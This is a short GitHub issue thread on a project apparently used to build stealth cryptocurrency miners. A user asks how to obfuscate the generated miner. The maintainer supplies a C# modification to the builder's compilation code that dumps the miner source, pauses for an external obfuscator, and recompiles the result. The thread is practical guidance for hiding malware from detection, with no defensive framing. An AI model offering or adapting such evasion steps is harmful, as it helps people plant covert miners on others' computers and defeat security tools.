### ISSUE TITLE
Obfuscation

### ISSUE THREAD

**Issue by A3ima** [UnamSanctam/SilentCryptoMiner#835]
i have some source obfuscator for C#/C/C++ but that miner give .Net exe no source code for you to compile yourself, any way i can obfuscate some part of the miner builder src so the miner will be obfuscated

**Comment by UnamSanctam** [comment]
Well you can technically make it write out the source code by changing some of the compilation code if you want to do that, by default it will compile it all inside memory.

Before the actual compilation just make it print out the source file, then read it back in when you've obfuscated it. Something like this, change this line:
https://github.com/UnamSanctam/SilentCryptoMiner/blob/21401c56710ba3f49bdaef0fd51b39c078bd8c9d/SilentCryptoMiner/Classes/Codedom.cs#L78
To:
```
File.WriteAllText(savePath + ".source", minerbuilder.ToString());
MessageBox.Show("Press OK when obfuscation is done and when the original file has been replaced.");
var Results = CodeProvider.CompileAssemblyFromSource(parameters, File.ReadAllText(savePath + ".source"));
```

**Comment by A3ima** [comment]
thanks very helpful
